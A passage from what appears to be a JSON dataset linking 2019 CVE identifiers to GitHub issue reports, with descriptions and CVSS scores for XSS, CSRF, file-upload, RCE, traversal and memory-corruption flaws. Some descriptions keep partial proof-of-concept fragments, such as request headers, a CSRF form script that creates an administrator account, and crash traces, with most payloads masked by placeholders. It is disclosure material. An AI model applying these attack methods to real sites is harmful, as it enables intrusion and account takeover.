operation for users to modify and delete.",
  44950. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  44951. "severity": "MEDIUM",
  44952. "baseScore": 6.5,
  44953. "impactScore": 3.6,
  44954. "exploitabilityScore": 2.8
  44955. },
  44956. {
  44957. "CVE_ID": "CVE-2019-9050",
  44958. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/70",
  44959. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/70",
  44960. "Repo_new": "pluck-cms/pluck",
  44961. "Issue_Created_At": "2019-02-18T07:28:57Z",
  44962. "description": "A file upload vulnerability. Vulnerability details: In the management module page, the installation module uploads a compressed webshell, which can be directly uploaded and decompressed, causing the entire website to crash. Vulnerability url: URLTAG Vulnerability POC: POST APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG APITAG Upgrade Insecure Requests NUMBERTAG Content Disposition: form data; name=\"sendfile\"; APITAG Content Type: application/x zip compressed",
  44963. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  44964. "severity": "HIGH",
  44965. "baseScore": 7.2,
  44966. "impactScore": 5.9,
  44967. "exploitabilityScore": 1.2
  44968. },
  44969. {
  44970. "CVE_ID": "CVE-2019-9082",
  44971. "Issue_Url_old": "https://github.com/xiayulei/open_source_bms/issues/33",
  44972. "Issue_Url_new": "https://github.com/suitablecodes/open_source_bms/issues/33",
  44973. "Repo_new": "suitablecodes/open_source_bms",
  44974. "Issue_Created_At": "2019-01-12T03:43:00Z",
  44975. "description": "There is A RCE vulnerability in your system.. The APITAG Command Execution) vulnerability is triggered by a http APITAG executed the command \"whoami\". poc: URLTAG FILETAG FILETAG",
  44976. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44977. "severity": "HIGH",
  44978. "baseScore": 8.8,
  44979. "impactScore": 5.9,
  44980. "exploitabilityScore": 2.8
  44981. },
  44982. {
  44983. "CVE_ID": "CVE-2019-9107",
  44984. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/169",
  44985. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/169",
  44986. "Repo_new": "wuzhicms/wuzhicms",
  44987. "Issue_Created_At": "2019-02-14T02:24:30Z",
  44988. "description": "wuzhicms NUMBERTAG imgurl reflected xss vulnerability. A xss vulnerability was discovered in WUZHI CMS NUMBERTAG",
  44989. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44990. "severity": "MEDIUM",
  44991. "baseScore": 6.1,
  44992. "impactScore": 2.7,
  44993. "exploitabilityScore": 2.8
  44994. },
  44995. {
  44996. "CVE_ID": "CVE-2019-9108",
  44997. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/171",
  44998. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/171",
  44999. "Repo_new": "wuzhicms/wuzhicms",
  45000. "Issue_Created_At": "2019-02-14T03:12:32Z",
  45001. "description": "wuzhicms NUMBERTAG baidumap reflected xss vulnerability. A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the x or y parameter of APITAG Vulnerability file: APITAG ERRORTAG APITAG APITAG FILETAG FILETAG",
  45002. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45003. "severity": "MEDIUM",
  45004. "baseScore": 6.1,
  45005. "impactScore": 2.7,
  45006. "exploitabilityScore": 2.8
  45007. },
  45008. {
  45009. "CVE_ID": "CVE-2019-9110",
  45010. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/170",
  45011. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/170",
  45012. "Repo_new": "wuzhicms/wuzhicms",
  45013. "Issue_Created_At": "2019-02-14T03:05:39Z",
  45014. "description": "wuzhicms NUMBERTAG set_iframe reflected xss vulnerability. A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the set_iframe parameter of APITAG Vulnerability file: APITAG ERRORTAG APITAG APITAG Triggered when the user was logged in without verified email address: FILETAG",
  45015. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45016. "severity": "MEDIUM",
  45017. "baseScore": 6.1,
  45018. "impactScore": 2.7,
  45019. "exploitabilityScore": 2.8
  45020. },
  45021. {
  45022. "CVE_ID": "CVE-2019-9113",
  45023. "Issue_Url_old": "https://github.com/libming/libming/issues/171",
  45024. "Issue_Url_new": "https://github.com/libming/libming/issues/171",
  45025. "Repo_new": "libming/libming",
  45026. "Issue_Created_At": "2019-01-02T06:33:17Z",
  45027. "description": "Null pointer dereference in APITAG (decompile.c NUMBERTAG A null pointer dereference was found in function APITAG (decompile.c line NUMBERTAG Details is as below: ERRORTAG poc file : URLTAG Reproduce it using: APITAG credit: APITAG of Venustech",
  45028. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45029. "severity": "HIGH",
  45030. "baseScore": 8.8,
  45031. "impactScore": 5.9,
  45032. "exploitabilityScore": 2.8
  45033. },
  45034. {
  45035. "CVE_ID": "CVE-2019-9115",
  45036. "Issue_Url_old": "https://github.com/irisnet/irisnet-crypto/issues/60",
  45037. "Issue_Url_new": "https://github.com/irisnet/irisnet-crypto/issues/60",
  45038. "Repo_new": "irisnet/irisnet-crypto",
  45039. "Issue_Created_At": "2019-01-16T11:32:46Z",
  45040. "description": "NUMBERTAG In the FILETAG file line NUMBERTAG eval maybe execute malice code\uff0c",
  45041. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45042. "severity": "CRITICAL",
  45043. "baseScore": 9.8,
  45044. "impactScore": 5.9,
  45045. "exploitabilityScore": 3.9
  45046. },
  45047. {
  45048. "CVE_ID": "CVE-2019-9142",
  45049. "Issue_Url_old": "https://github.com/b3log/symphony/issues/860",
  45050. "Issue_Url_new": "https://github.com/b3log/symphony/issues/860",
  45051. "Repo_new": "b3log/symphony",
  45052. "Issue_Created_At": "2019-01-23T11:12:10Z",
  45053. "description": "Stored Cross Site Scripting(XSS) vulnerability. APITAG NUMBERTAG",
  45054. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45055. "severity": "MEDIUM",
  45056. "baseScore": 6.1,
  45057. "impactScore": 2.7,
  45058. "exploitabilityScore": 2.8
  45059. },
  45060. {
  45061. "CVE_ID": "CVE-2019-9143",
  45062. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/711",
  45063. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/711",
  45064. "Repo_new": "exiv2/exiv2",
  45065. "Issue_Created_At": "2019-02-21T11:50:59Z",
  45066. "description": "uncontrolled recursion loop in APITAG Description During our research ,we Observed that an infinite uncontrolled recursion loop, at function APITAG at file image.cpp . It allows an attacker to cause Denial of Service or possibly have unspecified other impact. Command APITAG POC REPRODUCER URLTAG Debug GDB CODETAG",
  45067. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45068. "severity": "HIGH",
  45069. "baseScore": 8.8,
  45070. "impactScore": 5.9,
  45071. "exploitabilityScore": 2.8
  45072. },
  45073. {
  45074. "CVE_ID": "CVE-2019-9144",
  45075. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/712",
  45076. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/712",
  45077. "Repo_new": "exiv2/exiv2",
  45078. "Issue_Created_At": "2019-02-21T11:57:14Z",
  45079. "description": "Uncontrolled recursion loop in Exi NUMBERTAG anonymous APITAG ) . Description During our research ,we Observed that an infinite uncontrolled recursion loop, at function APITAG ) located in APITAG . It allows an attacker to cause Denial of Service or possibly have unspecified other impact. Command exi NUMBERTAG b u k p R pr $POC POC REPRODUCER URLTAG Debug GDB ERRORTAG",
  45080. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45081. "severity": "HIGH",
  45082. "baseScore": 8.8,
  45083. "impactScore": 5.9,
  45084. "exploitabilityScore": 2.8
  45085. },
  45086. {
  45087. "CVE_ID": "CVE-2019-9212",
  45088. "Issue_Url_old": "https://github.com/alipay/sofa-hessian/issues/34",
  45089. "Issue_Url_new": "https://github.com/sofastack/sofa-hessian/issues/34",
  45090. "Repo_new": "sofastack/sofa-hessian",
  45091. "Issue_Created_At": "2019-02-24T00:30:09Z",
  45092. "description": "hessian deserialization blacklist bypass . URLTAG url that sofa hessian prevent deserialization by maintaining blacklists. However, the blacklist does not add APITAG and APITAG and there are cases where it continues to be utilized. Take the following poc as an example: URLTAG url",
  45093. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45094. "severity": "CRITICAL",
  45095. "baseScore": 9.8,
  45096. "impactScore": 5.9,
  45097. "exploitabilityScore": 3.9
  45098. },
  45099. {
  45100. "CVE_ID": "CVE-2019-9226",
  45101. "Issue_Url_old": "https://github.com/baigoStudio/baigoCMS/issues/7",
  45102. "Issue_Url_new": "https://github.com/baigostudio/baigocms/issues/7",
  45103. "Repo_new": "baigostudio/baigocms",
  45104. "Issue_Created_At": "2019-02-28T08:43:59Z",
  45105. "description": "There is a stored XSS vulnerability. Vulnerability description A xss vulnerability was discovered in APITAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form(opt FILETAG FILETAG FILETAG FILETAG",
  45106. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45107. "severity": "MEDIUM",
  45108. "baseScore": 6.1,
  45109. "impactScore": 2.7,
  45110. "exploitabilityScore": 2.8
  45111. },
  45112. {
  45113. "CVE_ID": "CVE-2019-9227",
  45114. "Issue_Url_old": "https://github.com/baigoStudio/baigoCMS/issues/8",
  45115. "Issue_Url_new": "https://github.com/baigostudio/baigocms/issues/8",
  45116. "Repo_new": "baigostudio/baigocms",
  45117. "Issue_Created_At": "2019-02-28T09:49:16Z",
  45118. "description": "There is an Arbitrary Content Injection vulnerability leading to Code Execution . Vulnerability description There is a vulnerability which allows remote attackers to execute arbitrary code. The 'BG_SITE_NAME' parameter which includes malicious code can be written into APITAG poc APITAG FILETAG FILETAG FILETAG",
  45119. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45120. "severity": "CRITICAL",
  45121. "baseScore": 9.8,
  45122. "impactScore": 5.9,
  45123. "exploitabilityScore": 3.9
  45124. },
  45125. {
  45126. "CVE_ID": "CVE-2019-9278",
  45127. "Issue_Url_old": "https://github.com/libexif/libexif/issues/26",
  45128. "Issue_Url_new": "https://github.com/libexif/libexif/issues/26",
  45129. "Repo_new": "libexif/libexif",
  45130. "Issue_Created_At": "2019-11-11T13:46:03Z",
  45131. "description": "Relevant commit for CVETAG . As the CVE quotes, > In libexif, there is a possible out of bounds write due to an integer overflow. This could lead to remote escalation of privilege in the media content provider with no additional execution privileges needed. User interaction is needed for exploitation. Do we have a fix for it yet? Relevant bug report at Debian Security Tracker: URLTAG",
  45132. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45133. "severity": "HIGH",
  45134. "baseScore": 8.8,
  45135. "impactScore": 5.9,
  45136. "exploitabilityScore": 2.8
  45137. },
  45138. {
  45139. "CVE_ID": "CVE-2019-9544",
  45140. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/374",
  45141. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/374",
  45142. "Repo_new": "axiomatic-systems/bento4",
  45143. "Issue_Created_At": "2019-02-28T15:32:28Z",
  45144. "description": "Out of bound write in APITAG Description we observed a Out of bound write occured in function APITAG located in APITAG same be triggered by sending a crafted file to the FILETAG (windows)] [mp NUMBERTAG hls(ubuntu)] binary. It allows an attacker to cause Denial of Service APITAG fault) or possibly have unspecified other impact. Command in linux mp NUMBERTAG hls hls version NUMBERTAG pmt pid NUMBERTAG ideo pid NUMBERTAG ideo track id NUMBERTAG segment duration NUMBERTAG segment duration threshold NUMBERTAG pcr offset NUMBERTAG index filename APITAG segment filename template stream.mp4 output single file $POC Command in windows mp NUMBERTAG hls.exe hls version NUMBERTAG pmt pid NUMBERTAG ideo pid NUMBERTAG ideo track id NUMBERTAG segment duration NUMBERTAG segment duration threshold NUMBERTAG pcr offset NUMBERTAG index filename APITAG segment filename template stream.mp4 output single file $POC POC [REPRODUCER URLTAG Degub ASAN REPORT ~~~ ASAN report: WARNING: forcing version to NUMBERTAG in order to support single file output APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG d NUMBERTAG at pc NUMBERTAG f NUMBERTAG bp NUMBERTAG bfffd NUMBERTAG sp NUMBERTAG bfffcff8 WRITE of size NUMBERTAG at NUMBERTAG b NUMBERTAG d NUMBERTAG thread T NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG int) PATHTAG NUMBERTAG in APITAG int, unsigned char, unsigned int, APITAG PATHTAG NUMBERTAG aa in APITAG int, APITAG PATHTAG NUMBERTAG e9a in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG ee in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG c NUMBERTAG f in APITAG APITAG unsigned long long) PATHTAG NUMBERTAG c NUMBERTAG a1 in APITAG int, unsigned long long, bool, APITAG APITAG PATHTAG NUMBERTAG c2c NUMBERTAG in APITAG int, unsigned long long, bool, bool, APITAG APITAG PATHTAG NUMBERTAG d0 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG NUMBERTAG 
ee in APITAG unsigned long long&, APITAG &) PATHTAG NUMBERTAG c NUMBERTAG f in APITAG APITAG unsigned long long) PATHTAG NUMBERTAG c NUMBERTAG a1 in APITAG int, unsigned long long, bool, APITAG APITAG PATHTAG NUMBERTAG c2c NUMBERTAG in APITAG int, unsigned long long, bool, bool, APITAG APITAG PATHTAG NUMBERTAG d0 in APITAG unsigned int, unsigned int, unsigned long long, APITAG &) PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG APITAG Shadow bytes around the buggy address NUMBERTAG a NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING ~~~ GDB ~~~ PATHTAG NUMBERTAG APITAG result = APITAG NUMBERTAG if (AP4_FAILED(result)) return result NUMBERTAG construct the new items NUMBERTAG for (unsigned int APITAG i APITAG APITAG item_count NUMBERTAG d NUMBERTAG APITAG size NUMBERTAG c, version NUMBERTAG flags NUMBERTAG stream= APITAG NUMBERTAG bf5 \u2192 APITAG stream= APITAG NUMBERTAG f NUMBERTAG da \u2192 APITAG stream= MENTIONTAG type NUMBERTAG size NUMBERTAG c, size NUMBERTAG c, atom= APITAG NUMBERTAG f NUMBERTAG a \u2192 APITAG stream= MENTIONTAG bytes_available= MENTIONTAG atom= APITAG NUMBERTAG a4cd5 \u2192 APITAG atom_factory= MENTIONTAG stream= MENTIONTAG size 
NUMBERTAG a NUMBERTAG a4a NUMBERTAG APITAG type NUMBERTAG c, size NUMBERTAG a NUMBERTAG force NUMBERTAG stream= MENTIONTAG atom_factory= APITAG NUMBERTAG a NUMBERTAG e5 \u2192 APITAG size NUMBERTAG a NUMBERTAG is_full NUMBERTAG force NUMBERTAG stream= MENTIONTAG atom_factory= APITAG NUMBERTAG f5bbf \u2192 APITAG stream= MENTIONTAG type NUMBERTAG c, size NUMBERTAG a NUMBERTAG size NUMBERTAG a NUMBERTAG atom= APITAG NUMBERTAG f NUMBERTAG a \u2192 APITAG stream= MENTIONTAG bytes_available= MENTIONTAG atom= APITAG APITAG gef\u27a4 p/d entry_count NUMBERTAG gef\u27a4 p/d item_count NUMBERTAG gef\u27a4 ptype i type = unsigned int gef\u27a4 p/d i NUMBERTAG gef\u27a4 p/d APITAG NUMBERTAG gef\u27a4 ptype APITAG type = class APITAG { public: AP4_UI NUMBERTAG APITAG AP4_UI NUMBERTAG APITAG APITAG APITAG AP4_UI NUMBERTAG gef\u27a4 x APITAG Cannot access memory at address NUMBERTAG gef\u27a4 p APITAG Cannot access memory at address NUMBERTAG gef\u27a4 i r ea NUMBERTAG ec NUMBERTAG b7df NUMBERTAG b7df NUMBERTAG ed NUMBERTAG e NUMBERTAG e NUMBERTAG eb NUMBERTAG ac NUMBERTAG ac NUMBERTAG esp NUMBERTAG bfffe NUMBERTAG bfffe NUMBERTAG ebp NUMBERTAG bfffe NUMBERTAG bfffe NUMBERTAG esi NUMBERTAG c NUMBERTAG c NUMBERTAG edi NUMBERTAG b7df NUMBERTAG b7df NUMBERTAG eip NUMBERTAG ef NUMBERTAG ef NUMBERTAG APITAG eflags NUMBERTAG AF SF IF RF ] cs NUMBERTAG ss NUMBERTAG b NUMBERTAG b ds NUMBERTAG b NUMBERTAG b es NUMBERTAG b NUMBERTAG b fs NUMBERTAG gs NUMBERTAG DEBUG ON WINDOWS ~~~ STACK_TEXT NUMBERTAG be NUMBERTAG d6b2d NUMBERTAG f NUMBERTAG APITAG NUMBERTAG be NUMBERTAG c NUMBERTAG d NUMBERTAG e NUMBERTAG e NUMBERTAG be NUMBERTAG APITAG NUMBERTAG be7bc NUMBERTAG d NUMBERTAG b NUMBERTAG c NUMBERTAG APITAG NUMBERTAG be NUMBERTAG a1fb NUMBERTAG c NUMBERTAG f APITAG NUMBERTAG be NUMBERTAG a NUMBERTAG dd NUMBERTAG c NUMBERTAG APITAG NUMBERTAG be9e NUMBERTAG ae0b NUMBERTAG bea NUMBERTAG bea NUMBERTAG APITAG FAILURE_BUCKET_ID: APITAG BUCKET_ID: APITAG APITAG c NUMBERTAG APITAG violation) 
FAULTING_SOURCE_FILE: PATHTAG FAILURE_FUNCTION_NAME: APITAG Registers: ea NUMBERTAG f NUMBERTAG eb NUMBERTAG efde NUMBERTAG ec NUMBERTAG f NUMBERTAG ed NUMBERTAG esi NUMBERTAG be NUMBERTAG edi NUMBERTAG be7b0 eip NUMBERTAG d NUMBERTAG f1 esp NUMBERTAG be NUMBERTAG c ebp NUMBERTAG be NUMBERTAG iopl NUMBERTAG nv up ei pl nz na po nc cs NUMBERTAG ss NUMBERTAG b ds NUMBERTAG b es NUMBERTAG b fs NUMBERTAG gs NUMBERTAG b efl NUMBERTAG",
  45145. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45146. "severity": "HIGH",
  45147. "baseScore": 8.8,
  45148. "impactScore": 5.9,
  45149. "exploitabilityScore": 2.8
  45150. },
  45151. {
  45152. "CVE_ID": "CVE-2019-9549",
  45153. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/17",
  45154. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/17",
  45155. "Repo_new": "popojicms/popojicms",
  45156. "Issue_Created_At": "2019-03-02T15:46:46Z",
  45157. "description": "I found a CSRF vulnerability. POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG APITAG Write a POST script FILETAG APITAG APITAG APITAG function post(url,fields) { var p APITAG p.action= url; p.method=\"POST\"; p.target=\"_self\"; APITAG = fields; APITAG APITAG } function APITAG { var fields; fields += \" APITAG \"; fields += \" APITAG \"; fields += \" APITAG \"; fields += \" APITAG \"; var url=\" FILETAG PATHTAG post(url,fields); } APITAG = APITAG { APITAG APITAG APITAG APITAG Sent to the site owner, he created an administrator account by opening the link FILETAG",
  45158. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45159. "severity": "HIGH",
  45160. "baseScore": 8.8,
  45161. "impactScore": 5.9,
  45162. "exploitabilityScore": 2.8
  45163. },
  45164. {
  45165. "CVE_ID": "CVE-2019-9550",
  45166. "Issue_Url_old": "https://github.com/ShaoGongBra/dhcms/issues/1",
  45167. "Issue_Url_new": "https://github.com/shaogongbra/dhcms/issues/1",
  45168. "Repo_new": "shaogongbra/dhcms",
  45169. "Issue_Created_At": "2019-03-02T05:03:09Z",
  45170. "description": "Dhcms Stored XSS APITAG Privilege). Vulnerability details: APITAG the admin backend: URLTAG APITAG form FILETAG APITAG FILETAG and input:\"> APITAG APITAG you can receive the cookie information FILETAG",
  45171. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  45172. "severity": "MEDIUM",
  45173. "baseScore": 4.8,
  45174. "impactScore": 2.7,
  45175. "exploitabilityScore": 1.7
  45176. },
  45177. {
  45178. "CVE_ID": "CVE-2019-9551",
  45179. "Issue_Url_old": "https://github.com/millken/doyocms/issues/2",
  45180. "Issue_Url_new": "https://github.com/millken/doyocms/issues/2",
  45181. "Repo_new": "millken/doyocms",
  45182. "Issue_Created_At": "2019-03-02T03:44:48Z",
  45183. "description": "Stored XSS APITAG Privilege). Holes for details: APITAG the backstage: FILETAG APITAG article APITAG editor FILETAG APITAG APITAG APITAG FILETAG FILETAG",
  45184. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  45185. "severity": "MEDIUM",
  45186. "baseScore": 4.8,
  45187. "impactScore": 2.7,
  45188. "exploitabilityScore": 1.7
  45189. },
  45190. {
  45191. "CVE_ID": "CVE-2019-9552",
  45192. "Issue_Url_old": "https://github.com/lmy1342554547/p2pProject/issues/1",
  45193. "Issue_Url_new": "https://github.com/lmy1342554547/p2pproject/issues/1",
  45194. "Repo_new": "lmy1342554547/p2pProject",
  45195. "Issue_Created_At": "2019-03-02T02:56:30Z",
  45196. "description": "APITAG P2P directory traversal vulnerabilities. Vulnerability details: APITAG P2P directory traversal vulnerabilities\uff0c A directory traversal (arbitrary file download) vulnerability is different from directory listing: it not only lets an attacker traverse the files under the web root, but also lets them browse or download files anywhere on the system, so an attacker can reach system files, server configuration files, and so on through directory traversal attacks. In general, the attack goes through the server's own file-serving API and is limited only by the standard file permissions of the server process. Strictly speaking, a directory traversal attack is not a web server vulnerability but a \"hole\" left by the web application's design. If the web application does not enforce proper access control on the paths it serves and allows HTTP traversal sequences, the attacker can access restricted directories and can execute commands outside the web root directory. Vulnerability screenshots\uff1a URL: URLTAG URLTAG URLTAG FILETAG FILETAG",
  45197. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45198. "severity": "CRITICAL",
  45199. "baseScore": 9.8,
  45200. "impactScore": 5.9,
  45201. "exploitabilityScore": 3.9
  45202. },
  45203. {
  45204. "CVE_ID": "CVE-2019-9570",
  45205. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/11",
  45206. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/11",
  45207. "Repo_new": "yzmcms/yzmcms",
  45208. "Issue_Created_At": "2019-03-05T06:59:56Z",
  45209. "description": "Bug: APITAG NUMBERTAG SS. Hi, I would like to report Cross Site Scripting vulnerability in APITAG NUMBERTAG POC: APITAG to administrator panel. APITAG below URL in browser which supports flash. url: URLTAG eg: APITAG alert('xss2') APITAG FILETAG FILETAG Fix: Filter the site_code parameter",
  45210. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  45211. "severity": "MEDIUM",
  45212. "baseScore": 4.8,
  45213. "impactScore": 2.7,
  45214. "exploitabilityScore": 1.7
  45215. },
  45216. {
  45217. "CVE_ID": "CVE-2019-9572",
  45218. "Issue_Url_old": "https://github.com/PearlyNautilus/Security-Code-Review/issues/3",
  45219. "Issue_Url_new": "https://github.com/pearlynautilus/security-code-review/issues/3",
  45220. "Repo_new": "PearlyNautilus/Security-Code-Review",
  45221. "Issue_Created_At": "2019-03-05T08:03:15Z",
  45222. "description": "APITAG There is another file upload vulnerability on upload Theme, APITAG NUMBERTAG APITAG Product APITAG URLTAG Show case: FILETAG Edit a php file with special name FILETAG Transform it to a zip file like this FILETAG Theme file uploading... FILETAG We can find it from backstage processes. \\schoolcms PATHTAG line NUMBERTAG function APITAG FILETAG FILETAG With function APITAG FILETAG that we uploaded save in a specified location: \\schoolcms PATHTAG FILETAG FILETAG",
  45223. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  45224. "severity": "HIGH",
  45225. "baseScore": 7.2,
  45226. "impactScore": 5.9,
  45227. "exploitabilityScore": 1.2
  45228. },
  45229. {
  45230. "CVE_ID": "CVE-2019-9594",
  45231. "Issue_Url_old": "https://github.com/8test/pentest/issues/1",
  45232. "Issue_Url_new": "https://github.com/8test/pentest/issues/1",
  45233. "Repo_new": "8test/pentest",
  45234. "Issue_Created_At": "2019-03-06T07:52:07Z",
  45235. "description": "audit of bluecms. FILETAG",
  45236. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45237. "severity": "CRITICAL",
  45238. "baseScore": 9.8,
  45239. "impactScore": 5.9,
  45240. "exploitabilityScore": 3.9
  45241. },
  45242. {
  45243. "CVE_ID": "CVE-2019-9595",
  45244. "Issue_Url_old": "https://github.com/source-trace/appcms/issues/1",
  45245. "Issue_Url_new": "https://github.com/source-trace/appcms/issues/1",
  45246. "Repo_new": "source-trace/appcms",
  45247. "Issue_Created_At": "2019-03-06T12:48:58Z",
  45248. "description": "XSS injection vulnerability exists in FILETAG . callback.php CODETAG $params not filtered so we can use APITAG APITAG FILETAG",
  45249. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45250. "severity": "MEDIUM",
  45251. "baseScore": 6.1,
  45252. "impactScore": 2.7,
  45253. "exploitabilityScore": 2.8
  45254. },
  45255. {
  45256. "CVE_ID": "CVE-2019-9598",
  45257. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/4",
  45258. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/4",
  45259. "Repo_new": "chshcms/cscms",
  45260. "Issue_Created_At": "2019-03-06T09:20:08Z",
  45261. "description": "Bug: APITAG NUMBERTAG CSRF. Hi, I would like to report CSRF vulnerability APITAG NUMBERTAG There is a CSRF vulnerability that can change of payment account to steal property POC: APITAG to administrator panel. APITAG below URL in browser which supports flash. url: URLTAG eg: APITAG modification FILETAG NUMBERTAG CSRF POC APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG modification FILETAG",
  45262. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  45263. "severity": "MEDIUM",
  45264. "baseScore": 6.5,
  45265. "impactScore": 3.6,
  45266. "exploitabilityScore": 2.8
  45267. },
  45268. {
  45269. "CVE_ID": "CVE-2019-9603",
  45270. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/29",
  45271. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/29",
  45272. "Repo_new": "bg5sbk/minicms",
  45273. "Issue_Created_At": "2019-03-06T08:43:27Z",
  45274. "description": "I found a CSRF vulnerability. One: use the CSRF vulnerability to delete an article. Vulnerability details: While the administrator is logged in, opening the attacker's webpage will automatically delete the specified article, because the delete request carries no anti-CSRF protection. Vulnerability url: FILETAG Vulnerability POC: APITAG",
  45275. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  45276. "severity": "MEDIUM",
  45277. "baseScore": 6.5,
  45278. "impactScore": 3.6,
  45279. "exploitabilityScore": 2.8
  45280. },
  45281. {
